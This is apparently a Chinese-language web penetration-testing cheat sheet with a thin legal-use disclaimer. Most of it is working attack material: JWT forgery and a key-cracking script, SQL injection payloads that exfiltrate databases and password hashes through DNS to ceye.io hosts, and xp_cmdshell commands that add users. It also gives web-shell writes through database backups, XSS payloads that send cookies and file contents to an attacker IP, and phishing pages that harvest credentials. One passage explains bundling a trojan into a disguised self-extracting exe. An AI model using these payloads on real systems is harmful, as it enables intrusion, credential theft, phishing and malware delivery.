免責(zé)聲明 本教程僅為合法的教學(xué)目的而準(zhǔn)備，嚴(yán)禁用于任何形式的違法犯罪活動(dòng)及其他商業(yè)行為，在使用本教程前，您應(yīng)確保該行為符合當(dāng)?shù)氐姆煞ㄒ?guī)，繼續(xù)閱讀即表示您需自行承擔(dān)所有操作的后果，如有異議，請立即停止本文章讀。

目錄

?web服務(wù)突破

一、一些存在問題的邏輯

二、JWT攻擊手法

未校驗(yàn)簽名

禁用哈希

?爆破弱密鑰

三、注入

注入無列名

結(jié)合dnslog

四、XSS

XSS克隆釣魚

偽造頁面釣魚

五、CSRF

六、php任意文件讀取/下載

---

?web服務(wù)突破

一、一些存在問題的邏輯

任意用戶注冊
可爆破用戶名
爆破用戶名，密碼
用戶名注入
萬能密碼
用戶名Xss
修改返回包信息，登入他人賬戶
修改cookie中的參數(shù)，如user,adminid等
HTML源碼、JS等查看信息搜集一章
后臺(tái)登錄參數(shù)修改為注冊參數(shù)/reg、/register、/sign等
密碼重置
1．重置一個(gè)賬戶，不發(fā)送驗(yàn)證碼，設(shè)置驗(yàn)證碼為空發(fā)送請求。
2．發(fā)送驗(yàn)證碼，查看相應(yīng)包
3．驗(yàn)證碼生存期的爆破
4．修改相應(yīng)包為成功的相應(yīng)包
5．手工直接跳轉(zhuǎn)到校驗(yàn)成功的界面
6．兩個(gè)賬戶，重置別人密碼時(shí)，替換驗(yàn)證碼為自己正確的驗(yàn)證碼
7．重置別人密碼時(shí)，替換為自己的手機(jī)號(hào)
8．重置自己的成功時(shí)，同意瀏覽器重置別人的，不發(fā)驗(yàn)證碼
9．替換用戶名，ID，cookie，token參數(shù)等驗(yàn)證身份的參數(shù)
10．通過越權(quán)修改他人的找回信息如手機(jī)/郵箱來重置

二、JWT攻擊手法

https://jwt.io/#debugger-io

未校驗(yàn)簽名

將原JWT串解碼后修改用戶名等身份認(rèn)證的地方，生成新token發(fā)送請求

禁用哈希

Alg代表加密方式，修改用戶名等身份認(rèn)證的地方，把HS256設(shè)置為none生成token發(fā)送請求，使用python的pyjwt模塊 ??

jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'},algorithm='none',key='')

?爆破弱密鑰

>pip3 install pyjwt
>python3 crack.py   import jwtimport termcolorjwt_str = R'token'with open('/root/password.txt') as f:for line in f:key_ = line.strip()try:jwt.decode(jwt_str,verify=True,key=key_)print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')breakexcept(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')except jwt.exceptions.InvalidSignatureError:print('\r',' ' * 64, '\r\btry',key_,end='',flush=True)continueelse:print('\r','\bnot found.')

三、注入

注入無列名

http://url/index.php?id=1 order by 6
http://url/index.php?id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -
http://url/index.php?id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -

結(jié)合dnslog

MYSQL結(jié)合dnslog
?id=1' and if((select load_file(concat('\\\\',(select database()),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
顯示數(shù)據(jù)庫
?id=1' and if((select load_file(concat('\\\\',(select schema_name from information_schema.schemata limit {0},1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
顯示表
?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='dbname' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=0x1x1x2x limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
顯示字段
?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
顯示數(shù)據(jù)
?id=1' and if((select load_file(concat('\\\\',(select hex(user) from users limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
MSSQL結(jié)合dnslog
查數(shù)據(jù)
?id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');
Sa密碼
?id=1DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';EXEC('master..xp_dirtree"\'+@host+'\foobar$"');
執(zhí)行命令
exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";
exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";
postgreSQL結(jié)合dnslog
?id=1;DROP TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR REPL+ACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;DECLARE query_result TEXT;BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';EXECUTE exec_cmd;END;$$ LANGUAGE plpgSQL SECURITY DEFINER;SELECT temp_function();
Oracle結(jié)合dnslog
?id=1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL;
?id=1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL;
?id=1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL;
?id=1 union SELECT UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL;拿shell判斷數(shù)據(jù)庫
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
查庫
?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0 --
?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 --

查表   import requests
import re
table_list = ['']def get_sqlserver_table(table_list, table_num):for num in range(0,table_num):# print("','".join(table_list))sql_str = "and (select top 1 name from [xxxx].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('{}'))>0".format("','".join(table_list))url = "http://www.xxxxx.cn/x.aspx?cid=1' {} AND 'aNmV'='aNmV".format(sql_str)r = requests.get(url, headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'})res = re.search(r'\'(.*)\'', r.content.decode('utf-8'),  re.M|re.I)table_name = str(res.group(1))table_list.append(table_name)print("[{}] - TableName: {}".format(str(r.status_code), table_name))if __name__ == "__main__":get_sqlserver_table(table_list, 16)   

判斷是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
執(zhí)行命令
;exec master..xp_cmdshell "net user name password /add"—
查看權(quán)限
and (select IS_SRVROLEMEMBER('sysadmin'))=1--  //sa
and (select IS_MEMBER('db_owner'))=1--   //  dbo
and (select IS_MEMBER('public'))=1--  //public
站庫分離獲取服務(wù)器IP
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;--
LOG備份
;alter database testdb set RECOVERY FULL --
;create table cmd (a image) --
;backup log testdb to disk = 'c:\wwwroot\shell.asp' with init --
;insert into cmd (a) values ('<%%25Execute(request("chopper"))%%25>')--
;backup log testdb to disk = 'c:\wwwroot\shell.asp' –
2000差異備份
;backup database testdb to disk ='c:\wwwroot\bak.bak';--
;create table [dbo].[testtable] ([cmd] [image]);--
;insert into testtable (cmd) values(木馬hex編碼);--
;backup database testdb to disk='c:\wwwroot\upload\shell.asp' WITH DIFFERENTIAL,FORMAT;--
2005差異備份
;alter/**/database/**/[testdb]/**/set/**/recovery/**/full—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
;create/**/table/**/[itpro]([a]/**/image)—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
;insert/**/into/**/[itpro]([a])/**/values(木馬hex編碼)—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=木馬保存路徑的SQL_EN編碼/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
;drop/**/table/**/[itpro]—
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
PostgreSQL寫shell
連接
>psql -U dbuser -d exampledb -h 127.0.0.1 -p 5432
查看版本
>select version();
列出數(shù)據(jù)庫
>select datname from pg_database;
列出所有表名
>select * from pg_tables;
讀取賬號(hào)秘密
>select usename,passwd from pg_shadow;
當(dāng)前用戶`>select user;修改密碼alter user postgres with password '123456';列目錄select pg_ls_dir('/etc');讀文件select pg_read_file('postgresql.auto.conf',0,100); #行數(shù)&drop table wooyun;create table wooyun(t TEXT);copy wooyun FROM '/etc/passwd';select * from wooyun limit 1 offset 0;&select lo_import('/etc/passwd',12345678);select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;寫文件create table shell(shell text not null);insert into shell values();copy shell(shell) to '/var/www/html/shell.php';&copy (select '') to '/var/www/html/shell.php';爆破MSF>use auxiliary/scanner/postgres/postgres_login執(zhí)行命令版本8.2以下create function system(cstring) returns int AS '/lib/libc.so.6', 'system' language C strict;create function system(cstring) returns int AS '/lib64/libc.so.6', 'system' language C strict;select system('id');`

四、XSS

打COOKIE
<svg/onload="javascript:document.location.href=('http://xx.xx.xx.xx:7777?cookie='+document.cookie)">
讀取HTML
<svg/onload="document.location='http://xx.xx.xx.xx:7777/?'+btoa(document.body.innerHTML)">
讀文件
<svg/onload="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{if (xmlhttp.readyState==4 && xmlhttp.status==200){document.location='http://xx.xx.xx.xx:7777/?'+btoa(xmlhttp.responseText);}
}
xmlhttp.open("GET","file.php",true);
xmlhttp.send();
">
XSS+SSRF讀取服務(wù)器文件
<svg/onload="
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{document.location='http://ip:23333/?'+btoa(xmlhttp.responseText);
}
}
xmlhttp.open("POST","request.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("url=file:///etc/passwd");
">

XSS克隆釣魚

保存js&css到服務(wù)器，登錄action改為接受密碼的文件action="./pass.php"   <?php //php$user=$_POST['username'];$pass=$_POST['password'];$file=fopen('pass.txt','a+');fwrite($file,$user."|"."pass" . "\n");fclose($file);echo "<script>window.location.href=\"http://192.168.0.1\"</script>\n";?>   構(gòu)造payload
<script>window.location.href="http://192.168.0.1/login.html"</script>
php –S 0.0.0.0:8080 –t ./

偽造頁面釣魚

方法1
https://github.com/r00tSe7en/Fake-flash.cn
添加xss平臺(tái)模塊
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert("您的FLASH版本過低，嘗試升級(jí)后訪問該頁面！");
window.location.href="http://www.flash.com";
制作自解壓捆綁
一個(gè)馬.exe，一個(gè)正常exe，全選，winrar添加到壓縮文件，選擇創(chuàng)建自解壓格式壓縮文件，高級(jí)->自解壓選項(xiàng)，設(shè)置解壓路徑，c:\windows\temp\，設(shè)置->解壓后運(yùn)行兩個(gè)exe文件，模式全部隱藏，更新，解壓并更新文件，覆蓋所有文件。
ResourceHacker修改文件圖標(biāo)
方法2
if(empty($_COOKIE['flash'])){echo '<script>alert("你當(dāng)前計(jì)算機(jī)的Flash軟件已經(jīng)很久未更新，將導(dǎo)致無法正常顯示界面內(nèi)容，請下載安裝最新版本！");window.location="http://www.flash.cn.xx.com/"</script>';setcookie("flash","true",time()+30*2400);
}

五、CSRF

查看有無token等驗(yàn)證身份的參數(shù)，刪掉后是否返回正常
查看header中referer,origin參數(shù)，刪掉后是否返回正常
使用csrftester/burpsuite生成表單，以另一賬號(hào)和瀏覽器打開測試
去掉referer中域名后面的文件夾或文件
替換二級(jí)域名

六、php任意文件讀取/下載

readfile()、file_get_contents()、fopen()等讀文件的函數(shù)不嚴(yán)謹(jǐn)，讀取文件路徑可控，輸出內(nèi)容。
下載配置文件
Redis、Weblogic、ftp、mysql、web配置文件、history文件、數(shù)據(jù)庫配置文件
下載log文件
下載web文件
/1.php?f=../../etc/passwd
/1.php?f=file:///etc/passwd(file://繞過../的防護(hù))
/1.php?f=file:///etc/passwd